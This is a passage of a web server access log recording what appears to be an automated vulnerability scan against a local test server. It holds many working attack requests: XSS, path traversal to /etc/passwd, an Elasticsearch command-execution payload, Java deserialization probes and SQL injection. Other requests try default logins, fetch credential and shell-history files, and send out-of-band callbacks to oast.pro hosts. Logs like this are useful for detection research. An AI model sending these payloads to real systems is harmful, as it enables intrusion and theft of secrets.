"19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordpress-popup/views/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29N5EiTk25o8LSByu3BgLlKv21b.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ca2tuc8smpv1g2s80ca03sq1xmxxi9nct.oast.pro", "http_referer":"http://ca2tuc8smpv1g2s80ca0jpeob9yymiup8.oast.pro/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.ca2tuc8smpv1g2s80ca0zpedeqazbhbjn.oast.pro"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 29N5EiX3iJmeXw1W1sfn5UxhSlt\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.121","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 